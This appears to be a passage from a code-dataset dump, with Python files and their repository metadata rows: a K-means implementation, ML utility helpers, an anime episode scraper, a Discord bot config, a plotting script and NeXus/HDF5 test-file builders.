for _ in range(K):
rand = random.randint(0, len(X)-1)
# The while loop prevents the random key to be repeated
# as we want unique cluster centers
while rand in rand_keys:
rand = random.randint(0, len(X)-1)
rand_keys.append(rand)
mu.append(X[rand])
mu = np.array(mu)
return mu
def K_Means(X, K, mu):
# This function is used to train our K-Means clustering algorithm and
# return the converged cluster centers
if len(mu) == 0:
# If the initial clusters are not initilaized we call the mu_generator( )
mu = mu_generator(X, K)
clusters = {}
# Keeping the track of the cluster centers
updated_mu = mu.copy()
for cluster in range(K):
# The clusters ranges from 0 to K-1
clusters[cluster] = []
for row in X:
least_dist = float("inf"); cluster_idx = None
for idx in range(len(mu)):
# Computing the eucledian distance between the sample and the cluster centers
euclid_dist = distance.euclidean(row, mu[idx])
# Finding the least distance between the input sample and the cluster center
# and appending the sample to the corresponding cluster
if euclid_dist <= least_dist:
least_dist = euclid_dist
cluster_idx = idx
clusters[cluster_idx].append(row)
for cluster in range(K):
# if the cluster is empty then continue
if len(clusters[cluster]) == 0:
continue
for dim in range(len(X[0])):
# Computing the average of the clusters to find the new cluster centers
avg = sum([i[dim] for i in clusters[cluster]])/len(clusters[cluster])
updated_mu[cluster][dim] = avg
if np.all(mu == updated_mu):
# If the updated cluster centers is equal to the original cluster
# centers stop the training process and return the cluster centers
return updated_mu
# else call again the K_Means( ) with the updated clusters as input
return(K_Means(X, K, updated_mu))
def K_Means_better(X, K):
# This funcion calls the K_Means algorithm multiple times to find the best converged
# cluster centers
cluster_centers = []; better_mu = {}
for _ in range(int(len(X)/2)):
# We use this loop to create multiple sets of cluster centers
rand_mu = mu_generator(X, K)
cluster_centers.append(rand_mu)
for idx in range(len(cluster_centers)):
# We compute the converged cluster centers for each of the cluster in cluster_centers
mu = (K_Means(X, K, cluster_centers[idx]))
# converting the list of lists to tuples of tuples so can use them as keys to dictionary
tmp = tuple(tuple(i) for i in mu)
# Computing how many times the converged cluster centers have been repeated and returning
# the cluster center with the highest vote
if tmp in better_mu.keys():
better_mu[tmp] += 1
else:
better_mu[tmp] = 1
cluster_centers = [(value,key) for key, value in better_mu.items()]
final_cluster = np.array(max(cluster_centers)[1])
return final_cluster
| 39.724138 | 97 | 0.640625 | 503 | 3,456 | 4.310139 | 0.272366 | 0.135609 | 0.031365 | 0.017989 | 0.066421 | 0.021218 | 0.021218 | 0 | 0 | 0 | 0 | 0.005263 | 0.285301 | 3,456 | 86 | 98 | 40.186047 | 0.87247 | 0.409722 | 0 | 0.076923 | 0 | 0 | 0.001489 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057692 | false | 0 | 0.057692 | 0 | 0.173077 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44be7e179d9f24df461429aeb0c1ef7aff9ab585 | 3,060 | py | Python | utils/static_common_utils.py | UESTC-Liuxin/CVMI_Sementic_Segmentation | dc5bf6e940cf6961ef65abb6e7ec372f29d55249 | [
"Apache-2.0"
] | null | null | null | utils/static_common_utils.py | UESTC-Liuxin/CVMI_Sementic_Segmentation | dc5bf6e940cf6961ef65abb6e7ec372f29d55249 | [
"Apache-2.0"
] | null | null | null | utils/static_common_utils.py | UESTC-Liuxin/CVMI_Sementic_Segmentation | dc5bf6e940cf6961ef65abb6e7ec372f29d55249 | [
"Apache-2.0"
] | null | null | null | '''
Author: Liu Xin
Date: 2021-11-13 19:11:06
LastEditors: Liu Xin
LastEditTime: 2021-11-25 15:44:12
Description: 静态工具库
FilePath: /CVMI_Sementic_Segmentation/utils/static_common_utils.py
'''
import os
import random
import numpy as np
import torch
import torch.backends.cudnn as cudnn
import warnings
from socket import gethostname
def set_random_seeds():
"""
@description : 设置所有的随机数种子
@param :
@Returns :
"""
seed = 6000
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
torch.cuda.manual_seed_all(seed) # if you are using multi-GPU.
np.random.seed(seed) # Numpy module.
random.seed(seed) # Python random module.
torch.manual_seed(seed)
torch.backends.cudnn.benchmark = False
torch.backends.cudnn.deterministic = True
def is_method_overridden(method, base_class, derived_class):
"""检查基类的方法是否在派生类中被重写(copied by mmcv)
Args:
method (str): the method name to check.
base_class (type): the class of the base class.
derived_class (type | Any): the class or instance of the derived class.
"""
assert isinstance(base_class, type), \
"base_class doesn't accept instance, Please pass class instead."
if not isinstance(derived_class, type):
derived_class = derived_class.__class__
base_method = getattr(base_class, method)
derived_method = getattr(derived_class, method)
return derived_method != base_method
def getuser():
"""Get the username from the environment or password database.
First try various environment variables, then the password
database. This works on Windows as long as USERNAME is set.
"""
for name in ('LOGNAME', 'USER', 'LNAME', 'USERNAME'):
user = os.environ.get(name)
if user:
return user
# If this fails, the exception will "explain" why
import pwd
return pwd.getpwuid(os.getuid())[0]
def get_host_info():
"""Get hostname and username.
Return empty string if exception raised, e.g. ``getpass.getuser()`` will
lead to error in docker container
"""
host = ''
try:
host = f'{getuser()}@{gethostname()}'
except Exception as e:
warnings.warn(f'Host or user not found: {str(e)}')
finally:
return host
def mkdir_or_exist(dir_name, mode=0o777):
if dir_name == '':
return
dir_name = os.path.expanduser(dir_name)
os.makedirs(dir_name, mode=mode, exist_ok=True)
def symlink(src, dst, overwrite=True, **kwargs):
if os.path.lexists(dst) and overwrite:
os.remove(dst)
os.symlink(src, dst, **kwargs)
def build_work_dir_suffix(global_cfg, data_cfg):
info_dict = dict(
bz=global_cfg.batch_size,
gpus=global_cfg.gpus,
optimizer_name= global_cfg.optimizer.name,
lr = global_cfg.optimizer.lr,
lr_sche=global_cfg.lr_config.policy,
dataset=data_cfg.name
)
formated_list = [ f"{key}_{value}" for key, value in info_dict.items()]
return ".".join(formated_list)
| 27.321429 | 79 | 0.66634 | 414 | 3,060 | 4.775362 | 0.439614 | 0.042489 | 0.027314 | 0.028832 | 0.042994 | 0.028326 | 0.028326 | 0 | 0 | 0 | 0 | 0.015711 | 0.230392 | 3,060 | 112 | 80 | 27.321429 | 0.823779 | 0.285294 | 0 | 0.033333 | 0 | 0 | 0.07604 | 0.012912 | 0 | 0 | 0 | 0 | 0.016667 | 1 | 0.116667 | false | 0.016667 | 0.133333 | 0 | 0.35 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44bf0a5052cbf6a144e0a5b040f0b62cdb2a95c6 | 230 | py | Python | receivers.py | MortalHappiness/mailer | cf7252d97ef42ac31f82e2745723c9d5629ac6a2 | [
"MIT"
] | null | null | null | receivers.py | MortalHappiness/mailer | cf7252d97ef42ac31f82e2745723c9d5629ac6a2 | [
"MIT"
] | null | null | null | receivers.py | MortalHappiness/mailer | cf7252d97ef42ac31f82e2745723c9d5629ac6a2 | [
"MIT"
] | null | null | null | import csv
def get_receivers():
"""
Return a list of receivers here
"""
with open("receivers.csv") as fin:
reader = csv.reader(fin)
receivers = [row[0] for row in reader]
return receivers
| 19.166667 | 46 | 0.591304 | 30 | 230 | 4.5 | 0.633333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00625 | 0.304348 | 230 | 11 | 47 | 20.909091 | 0.8375 | 0.134783 | 0 | 0 | 0 | 0 | 0.071038 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.166667 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44bfddd8311b2ce5f5b9d04ea8832fb97c03d8da | 4,309 | py | Python | anime_downloader/scrapers/gogoanime/gogoanime_scraper.py | Amdrossa/Anime | 9757f7c8d1a094da61e0c0ac38a2a29bf1c21e28 | [
"MIT"
] | 554 | 2020-04-15T20:22:50.000Z | 2022-03-31T11:07:53.000Z | anime_downloader/scrapers/gogoanime/gogoanime_scraper.py | Amdrossa/Anime | 9757f7c8d1a094da61e0c0ac38a2a29bf1c21e28 | [
"MIT"
] | 44 | 2020-04-15T19:26:43.000Z | 2022-03-11T09:59:24.000Z | anime_downloader/scrapers/gogoanime/gogoanime_scraper.py | Amdrossa/Anime | 9757f7c8d1a094da61e0c0ac38a2a29bf1c21e28 | [
"MIT"
] | 61 | 2020-04-16T19:17:04.000Z | 2022-03-27T14:51:54.000Z | import re
from util.Episode import Episode
from bs4 import BeautifulSoup
from extractors.jwplayer_extractor import JWPlayerExtractor
from scrapers.base_scraper import BaseScraper
from util.Color import printer
class GoGoAnimeScraper(BaseScraper):
def __init__(self, url, start_episode, end_episode, session, gui=None, resolution="480"):
super().__init__(url, start_episode, end_episode, session, gui)
self.resolution = resolution
self.extractor = JWPlayerExtractor(None, self.session)
self.anime_id = None
self.api_link_bases = ['https://ajax.gogocdn.net/ajax/load-list-episode',
'https://ajax.apimovie.xyz/ajax/load-list-episode']
self.__set_anime_id()
def __set_anime_id(self):
response = self.session.get(self.url)
if response.status_code == 200:
soup_html = BeautifulSoup(response.content, "html.parser")
movie_id_tag = soup_html.find("input", attrs={"id": "movie_id"})
if movie_id_tag is not None:
self.anime_id = movie_id_tag["value"]
def __get_episode_data(self):
for base_link in self.api_link_bases:
api_link = base_link + "?ep_start=" + str(self.start_episode) + "&ep_end=" + str(
self.end_episode) + "&id=" + self.anime_id
response = self.session.get(api_link)
if response.status_code == 200:
return response.content
return None
def __get_page_url(self, href):
base_url = re.search("(.*)/category/", self.url).group(1)
# print(base_url)
src = base_url + href
# print(src)
return src
def __set_stream_url(self, episode):
response = self.session.get(episode.page_url)
if response.status_code == 200:
soup_html = BeautifulSoup(response.content, "html.parser")
item_tag = soup_html.find("li", attrs={"class": "anime"}).find("a")
streamer_url = item_tag["data-video"]
if "https" not in streamer_url:
streamer_url = "https:" + streamer_url
streamer_resp = self.session.get(streamer_url)
if streamer_resp.status_code == 200:
sources = self.extractor.extract_sources(streamer_resp.text)
src = ""
for source in sources:
if "m3u8" in source:
src = source
break
if src != "":
res_link_id = self.extractor.get_resolution_link(src, self.resolution)
stream_base = re.search("(.*)/[\S]+\.m3u8", src).group(1)
episode.download_url = stream_base + "/" + res_link_id
print("stream url:", episode.download_url)
return True
return False
def __collect_episodes(self):
printer("INFO", "Extracting page URLs...", self.gui)
episodes = []
if self.anime_id is not None:
data = self.__get_episode_data()
if data is not None:
soup_html = BeautifulSoup(data, "html.parser")
anchor_tags = soup_html.findAll("a", href=True)
for anchor in anchor_tags:
href = anchor["href"].strip()
epi_no = int(href.split("-")[-1])
if epi_no < self.start_episode or epi_no > self.end_episode:
continue
episode = Episode("Episode - " + str(epi_no), "Episode - " + str(epi_no))
episode.is_direct = False
episode.page_url = self.__get_page_url(href)
val = self.__set_stream_url(episode)
if val:
episodes.append(episode)
else:
printer("ERROR", "Failed to collect download link for " + episode.title, self.gui)
return episodes
def get_direct_links(self):
try:
episodes = self.__collect_episodes()
if len(episodes) > 0:
return episodes
else:
return None
except Exception as ex:
printer("ERROR", str(ex), self.gui)
return None
| 38.81982 | 106 | 0.561383 | 489 | 4,309 | 4.695297 | 0.257669 | 0.018293 | 0.019164 | 0.028746 | 0.119338 | 0.093206 | 0.093206 | 0.062718 | 0.062718 | 0.062718 | 0 | 0.008395 | 0.336505 | 4,309 | 110 | 107 | 39.172727 | 0.794683 | 0.006034 | 0 | 0.134831 | 0 | 0 | 0.082243 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.078652 | false | 0 | 0.067416 | 0 | 0.258427 | 0.05618 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44bff82fd79a239bdafb6a54e8fdebc06260a17d | 1,355 | py | Python | mr_dale/config.py | evgeniy-tulyakov/mr-dale | 5a976ca11ba21e83a2adf2f9f4a77833a68da116 | [
"MIT"
] | null | null | null | mr_dale/config.py | evgeniy-tulyakov/mr-dale | 5a976ca11ba21e83a2adf2f9f4a77833a68da116 | [
"MIT"
] | null | null | null | mr_dale/config.py | evgeniy-tulyakov/mr-dale | 5a976ca11ba21e83a2adf2f9f4a77833a68da116 | [
"MIT"
] | null | null | null | '''
Constants necessary for the correct execution of this bot.
here, most of the values of the environment variables are extracted.
'''
from os import getenv
from pathlib import Path
# Base settings
PROJECT_PATH = Path(__file__).resolve().parent
UI_RESOURCES_PATH = PROJECT_PATH / 'ui_resources'
BOT_TOKEN = getenv('mrdtoken')
EXTENSIONS_LIST = [
'mr_dale.admin'
]
# Configuring the logging mechanism
LOG_FORMAT = {
'format': '%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]'
}
LOGGING_SETTINGS = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {'default': LOG_FORMAT},
'handlers': {
'info_console_handler': {
'class': 'logging.StreamHandler',
'level': 'INFO',
'formatter': 'default',
'stream': 'ext://sys.stdout'
},
'error_console_handler': {
'class': 'logging.StreamHandler',
'level': 'ERROR',
'stream': 'ext://sys.stderr'
}
},
'loggers': {
'mr_dale': {
'level': 'INFO',
'handlers': ['info_console_handler', 'error_console_handler'],
'propagate': False
},
'discord': {
'level': 'ERROR',
'handlers': ['error_console_handler'],
'propagate': False
}
}
}
| 23.77193 | 83 | 0.568266 | 132 | 1,355 | 5.621212 | 0.560606 | 0.09434 | 0.076819 | 0.070081 | 0.207547 | 0.118598 | 0 | 0 | 0 | 0 | 0 | 0.001031 | 0.284133 | 1,355 | 56 | 84 | 24.196429 | 0.763918 | 0.129889 | 0 | 0.195122 | 0 | 0.02439 | 0.401709 | 0.130769 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.04878 | 0 | 0.04878 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44c122eb2bc4fddfe34663b5e113bdd4620db9d3 | 1,305 | py | Python | work/plot.py | XUHUAKing/bigdata | 47cdccbd448eacf074c4521d5b40d1205b000fc6 | [
"CC-BY-4.0"
] | 6 | 2018-03-19T03:34:19.000Z | 2021-11-08T01:35:48.000Z | work/plot.py | XUHUAKing/bigdata | 47cdccbd448eacf074c4521d5b40d1205b000fc6 | [
"CC-BY-4.0"
] | null | null | null | work/plot.py | XUHUAKing/bigdata | 47cdccbd448eacf074c4521d5b40d1205b000fc6 | [
"CC-BY-4.0"
] | null | null | null | # needs a parameter to specify which training record to display
import matplotlib as mpl
from mpl_toolkits.mplot3d import Axes3D
import numpy as np
import matplotlib.pyplot as plt
import functions as fn
import sys
#from matplotlib.backends.backend_pdf import PdfPages
tdata, ttarget, tlabel = fn.get_training_data()
i = int(sys.argv[1])
tempdata = np.array([[0,0,0]])
for j in range(300):
if (tdata[i][j] == 0).all():
continue
temp = np.expand_dims(tdata[i][j], axis=0)
tempdata = np.append(tempdata, temp, axis=0)
tempdata = np.delete(tempdata, 0, 0)
t_data = tempdata.transpose((1, 0))
mpl.rcParams['legend.fontsize'] = 10
fig = plt.figure()
ax = fig.gca(projection='3d')
ax.set_xlabel('x')
ax.set_ylabel('t')
ax.set_zlabel('y')
ax.view_init(0, 90)
ax.set_title(i)
x = t_data[0]
y = t_data[1]
t = t_data[2]
x_target = np.linspace(ttarget[i][0], ttarget[i][0], 1000)
y_target = np.linspace(np.mean(t_data[1]), np.mean(t_data[1]), 1000)
#y_target = np.linspace(ttarget[i][1], ttarget[i][1], 1000)
t_target = np.linspace(np.min(t_data[2]), np.max(t_data[2]), 1000)
label = ['fake', 'real']
plt_label = label[int(tlabel[i][0])]
ax.plot(x, t, y, label=plt_label)
ax.plot(x_target, t_target, y_target, label="target: "+str(ttarget[i][0])+", "+str(ttarget[i][1]))
ax.legend()
plt.show() | 30.348837 | 98 | 0.691954 | 238 | 1,305 | 3.680672 | 0.37395 | 0.045662 | 0.073059 | 0.034247 | 0.111872 | 0 | 0 | 0 | 0 | 0 | 0 | 0.045455 | 0.123372 | 1,305 | 43 | 99 | 30.348837 | 0.72028 | 0.131034 | 0 | 0 | 0 | 0 | 0.033599 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44c3145c6b5a8cac5b0e2f9068f7547381896e10 | 31,414 | py | Python | python/tests/nexus_helpers.py | arm61/scippneutron | 20283e7b8f8772776978c539f8664f889d1fbded | [
"BSD-3-Clause"
] | null | null | null | python/tests/nexus_helpers.py | arm61/scippneutron | 20283e7b8f8772776978c539f8664f889d1fbded | [
"BSD-3-Clause"
] | null | null | null | python/tests/nexus_helpers.py | arm61/scippneutron | 20283e7b8f8772776978c539f8664f889d1fbded | [
"BSD-3-Clause"
] | null | null | null | from dataclasses import dataclass
from typing import List, Union, Iterator, Optional, Dict, Any, Tuple
import h5py
import numpy as np
from enum import Enum
from contextlib import contextmanager
import json
from scippneutron.file_loading._json_nexus import LoadFromJson, MissingDataset
h5root = Union[h5py.File, h5py.Group]
def _create_nx_class(group_name: str, nx_class_name: str, parent: h5root) -> h5py.Group:
nx_class = parent.create_group(group_name)
nx_class.attrs["NX_class"] = nx_class_name
return nx_class
@contextmanager
def in_memory_hdf5_file_with_two_nxentry() -> Iterator[h5py.File]:
nexus_file = h5py.File('in_memory_events.nxs',
mode='w',
driver="core",
backing_store=False)
try:
_create_nx_class("entry_1", "NXentry", nexus_file)
_create_nx_class("entry_2", "NXentry", nexus_file)
yield nexus_file
finally:
nexus_file.close()
@dataclass
class EventData:
event_id: Optional[np.ndarray]
event_time_offset: Optional[np.ndarray]
event_time_zero: Optional[np.ndarray]
event_index: Optional[np.ndarray]
event_time_zero_unit: Optional[Union[str, bytes]] = "ns"
event_time_zero_offset: Optional[Union[str, bytes]] = "1970-01-01T00:00:00Z"
event_time_offset_unit: Optional[Union[str, bytes]] = "ns"
@dataclass
class Log:
name: str
value: Optional[np.ndarray]
time: Optional[np.ndarray] = None
value_units: Optional[Union[str, bytes]] = None
# From
# https://manual.nexusformat.org/classes/base_classes/NXlog.html?highlight=nxlog
# time units are non-optional if time series data is present, and the unit
# must be a unit of time (i.e. convertible to seconds).
time_units: Optional[Union[str, bytes]] = "s"
start_time: Optional[Union[str, bytes]] = None
scaling_factor: Optional[float] = None
class TransformationType(Enum):
TRANSLATION = "translation"
ROTATION = "rotation"
@dataclass
class Transformation:
transform_type: TransformationType
vector: np.ndarray
value: Optional[np.ndarray]
time: Optional[np.ndarray] = None
depends_on: Union["Transformation", str, None] = None
offset: Optional[np.ndarray] = None
value_units: Optional[Union[str, bytes]] = None
time_units: Optional[Union[str, bytes]] = None
@dataclass
class Detector:
detector_numbers: Optional[np.ndarray] = None
event_data: Optional[EventData] = None
log: Optional[Log] = None
x_offsets: Optional[np.ndarray] = None
y_offsets: Optional[np.ndarray] = None
z_offsets: Optional[np.ndarray] = None
offsets_unit: Optional[Union[str, bytes]] = None
depends_on: Optional[Transformation] = None
@dataclass
class Sample:
name: str
depends_on: Optional[Transformation] = None
distance: Optional[float] = None
distance_units: Optional[Union[str, bytes]] = None
ub_matrix: Optional[np.ndarray] = None
orientation_matrix: Optional[np.ndarray] = None
@dataclass
class Source:
name: str
depends_on: Union[Transformation, None, str] = None
distance: Optional[float] = None
distance_units: Optional[Union[str, bytes]] = None
@dataclass
class Chopper:
name: str
distance: float
rotation_speed: float
distance_units: Optional[str] = None
rotation_units: Optional[str] = None
@dataclass
class Link:
new_path: str
target_path: str
@dataclass
class DatasetAtPath:
path: str
data: np.ndarray
attributes: Dict[str, Any]
@dataclass
class Stream:
"""
Only present in the JSON NeXus file templates, not in HDF5 NeXus files.
Records where to find data in Kafka that are streamed during an experiment.
"""
# Where the builder should place the stream object
path: str
# The following members correspond to fields in stream object.
# Some of them may not be of interest to Scipp but are to other
# software which consume the json template, for example
# the Filewriter (https://github.com/ess-dmsc/kafka-to-nexus)
# Kafka topic (named data stream)
topic: str = "motion_devices_topic"
# Source name, allows filtering and multiplexing to different
# writer_modules by the filewriter software
source: str = "linear_axis"
# Tells filewriter which plugin to use to deserialise
# messages in this stream and how to write the data to file.
# For example the "f142" writer module deserialises messages which
# were serialised with the "f142" flatbuffer schema
# (https://github.com/ess-dmsc/streaming-data-types/) and
# writes resulting timeseries data to file as an NXlog
# (https://manual.nexusformat.org/classes/base_classes/NXlog.html)
writer_module: str = "f142"
# Deserialised values are expected to be of this type
type: str = "double"
# Values have these units
value_units: str = "m"
@dataclass
class Monitor:
name: str
data: np.ndarray
axes: List[Tuple[str, np.ndarray]]
events: Optional[EventData] = None
class InMemoryNeXusWriter:
def add_dataset_at_path(self, file_root: h5py.File, path: str, data: np.ndarray,
attributes: Dict):
path_split = path.split("/")
dataset_name = path_split[-1]
parent_path = "/".join(path_split[:-1])
dataset = self.add_dataset(file_root[parent_path], dataset_name, data)
for name, value in attributes.items():
self.add_attribute(dataset, name, value)
@staticmethod
def add_dataset(parent: h5py.Group, name: str,
data: Union[str, bytes, np.ndarray]) -> h5py.Dataset:
return parent.create_dataset(name, data=data)
@staticmethod
def add_attribute(parent: Union[h5py.Group, h5py.Dataset], name: str,
value: Union[str, bytes, np.ndarray]):
parent.attrs[name] = value
@staticmethod
def add_group(parent: h5py.Group, name: str) -> h5py.Group:
return parent.create_group(name)
@staticmethod
def add_hard_link(file_root: h5py.File, new_path: str, target_path: str):
try:
_ = file_root[new_path]
del file_root[new_path]
except KeyError:
pass
file_root[new_path] = file_root[target_path]
@staticmethod
def add_soft_link(file_root: h5py.File, new_path: str, target_path: str):
try:
_ = file_root[new_path]
del file_root[new_path]
except KeyError:
pass
file_root[new_path] = h5py.SoftLink(target_path)
numpy_to_filewriter_type = {
np.float32: "float32",
np.float64: "float64",
np.int8: "int8",
np.int16: "int16",
np.int32: "int32",
np.int64: "int64",
np.uint8: "uint8",
np.uint16: "uint16",
np.uint32: "uint32",
np.uint64: "uint64"
}
def _add_link_to_json(file_root: Dict, new_path: str, target_path: str):
new_path_split = new_path.split("/")
link_name = new_path_split[-1]
parent_path = "/".join(new_path_split[:-1])
nexus = LoadFromJson(file_root)
parent_group = nexus.get_object_by_path(file_root, parent_path)
link = {"type": "link", "name": link_name, "target": target_path}
existing_object = nexus.get_child_from_group(parent_group, link_name)
if existing_object is not None:
parent_group["children"].remove(existing_object)
parent_group["children"].append(link)
def _parent_and_name_from_path(file_root: Dict, path: str) -> Tuple[Dict, str]:
path_split = path.split("/")
name = path_split[-1]
parent_path = "/".join(path_split[:-1])
nexus = LoadFromJson(file_root)
parent_group = nexus.get_object_by_path(file_root, parent_path)
return parent_group, name
class JsonWriter:
def add_dataset_at_path(self, file_root: Dict, path: str, data: np.ndarray,
attributes: Dict):
parent_group, dataset_name = _parent_and_name_from_path(file_root, path)
dataset = self.add_dataset(parent_group, dataset_name, data)
for name, value in attributes.items():
self.add_attribute(dataset, name, value)
@staticmethod
def add_dataset(parent: Dict, name: str, data: Union[str, bytes,
np.ndarray]) -> Dict:
if isinstance(data, (str, bytes)):
dataset_info = {"string_size": len(data), "type": "string"}
elif isinstance(data, float):
dataset_info = {"size": 1, "type": "float64"}
elif isinstance(data, int):
dataset_info = {"size": 1, "type": "int32"}
else:
dataset_info = {
"size": data.shape,
"type": numpy_to_filewriter_type[data.dtype.type]
}
new_dataset = {
"type": "dataset",
"name": name,
"values": data,
"dataset": dataset_info,
"attributes": []
}
parent["children"].append(new_dataset)
return new_dataset
@staticmethod
def add_attribute(parent: Dict, name: str, value: Union[str, bytes, np.ndarray]):
if isinstance(value, (str, bytes)):
attr_info = {"string_size": len(value), "type": "string"}
elif isinstance(value, float):
attr_info = {"size": 1, "type": "float64"}
elif isinstance(value, int):
attr_info = {"size": 1, "type": "int64"}
else:
attr_info = {
"size": value.shape,
"type": numpy_to_filewriter_type[value.dtype.type]
}
name_and_value = {"name": name, "values": value}
parent["attributes"].append({**attr_info, **name_and_value})
@staticmethod
def add_group(parent: Dict, name: str) -> Dict:
new_group = {"type": "group", "name": name, "children": [], "attributes": []}
parent["children"].append(new_group)
return new_group
@staticmethod
def add_hard_link(file_root: Dict, new_path: str, target_path: str):
_add_link_to_json(file_root, new_path, target_path)
@staticmethod
def add_soft_link(file_root: Dict, new_path: str, target_path: str):
_add_link_to_json(file_root, new_path, target_path)
def add_stream(self, file_root: Dict, stream: Stream):
new_stream = {
"type": "stream",
"stream": {
"topic": stream.topic,
"source": stream.source,
"writer_module": stream.writer_module,
"type": stream.type,
"value_units": stream.value_units
}
}
nexus = LoadFromJson(file_root)
try:
group = nexus.get_object_by_path(file_root, stream.path)
except MissingDataset:
parent, name = _parent_and_name_from_path(file_root, stream.path)
group = self.add_group(parent, name)
group["children"].append(new_stream)
class NumpyEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, np.ndarray):
return obj.tolist()
return json.JSONEncoder.default(self, obj)
class NexusBuilder:
"""
Allows building an in-memory NeXus file for use in tests
"""
def __init__(self):
self._event_data: List[EventData] = []
self._detectors: List[Detector] = []
self._logs: List[Log] = []
self._instrument_name: Optional[str] = None
self._choppers: List[Chopper] = []
self._title: Optional[str] = None
self._start_time: Optional[str] = None
self._end_time: Optional[str] = None
self._sample: List[Sample] = []
self._source: List[Source] = []
self._hard_links: List[Link] = []
self._soft_links: List[Link] = []
self._writer = None
self._datasets: List[DatasetAtPath] = []
self._streams = []
self._monitors = []
def add_dataset_at_path(self, path: str, data: np.ndarray, attributes: Dict):
self._datasets.append(DatasetAtPath(path, data, attributes))
def _write_datasets(self, root: Union[Dict, h5py.File]):
for dataset in self._datasets:
self._writer.add_dataset_at_path(root, dataset.path, dataset.data,
dataset.attributes)
def add_stream(self, stream: Stream):
self._streams.append(stream)
def add_detector(self, detector: Detector):
self._detectors.append(detector)
def add_event_data(self, event_data: EventData):
self._event_data.append(event_data)
def add_log(self, log: Log):
self._logs.append(log)
def add_instrument(self, name: str):
self._instrument_name = name
def add_chopper(self, chopper: Chopper):
self._choppers.append(chopper)
def add_title(self, title: str):
self._title = title
def add_run_start_time(self, start_time: str):
self._start_time = start_time
def add_run_end_time(self, end_time: str):
self._end_time = end_time
def add_sample(self, sample: Sample):
self._sample.append(sample)
def add_source(self, source: Source):
self._source.append(source)
def add_hard_link(self, link: Link):
"""
If there is a group or dataset at the link path it will
be replaced by the link
"""
self._hard_links.append(link)
def add_soft_link(self, link: Link):
"""
If there is a group or dataset at the link path it will
be replaced by the link
"""
self._soft_links.append(link)
def add_component(self, component: Union[Sample, Source]):
# This is a little ugly, but allows parametrisation
# of tests which should work for sample and source
if isinstance(component, Sample):
self.add_sample(component)
elif isinstance(component, Source):
self.add_source(component)
def add_monitor(self, monitor: Monitor):
self._monitors.append(monitor)
@property
def json_string(self):
self._writer = JsonWriter()
root = {"children": []}
self._write_file(root)
return json.dumps(root, indent=4, cls=NumpyEncoder)
def create_json_file(self):
"""
Create a file on disk, do not use this in tests, it is intended to
be used as a tool during test development
"""
self._writer = JsonWriter()
root = {"children": []}
self._write_file(root)
with open("test_json.txt", "w") as json_file:
return json.dump(root, json_file, indent=4, cls=NumpyEncoder)
@contextmanager
def file(self) -> Iterator[h5py.File]:
# "core" driver means file is "in-memory" not on disk.
# backing_store=False prevents file being written to
# disk on flush() or close().
nexus_file = h5py.File('in_memory_events.nxs',
mode='w',
driver="core",
backing_store=False)
self._writer = InMemoryNeXusWriter()
try:
self._write_file(nexus_file)
yield nexus_file
finally:
nexus_file.close()
def _write_file(self, nexus_file: Union[h5py.File, Dict]):
entry_group = self._create_nx_class("entry", "NXentry", nexus_file)
if self._title is not None:
self._writer.add_dataset(entry_group, "title", data=self._title)
if self._start_time is not None:
self._writer.add_dataset(entry_group, "start_time", data=self._start_time)
if self._end_time is not None:
self._writer.add_dataset(entry_group, "end_time", data=self._end_time)
self._write_event_data(entry_group)
self._write_logs(entry_group)
self._write_sample(entry_group)
self._write_source(entry_group)
if self._instrument_name is None:
parent_group = entry_group
parent_path = "/entry"
else:
parent_group = self._write_instrument(entry_group)
parent_path = "/entry/instrument"
self._write_choppers(parent_group)
self._write_detectors(parent_group, parent_path)
self._write_datasets(nexus_file)
self._write_streams(nexus_file)
self._write_links(nexus_file)
self._write_monitors(nexus_file)
def create_file_on_disk(self, filename: str):
"""
Create a file on disk, do not use this in tests, it is intended to
be used as a tool during test development. Output file can be
explored using a tool such as HDFView.
"""
nexus_file = h5py.File(filename, mode='w')
self._writer = InMemoryNeXusWriter()
try:
self._write_file(nexus_file)
finally:
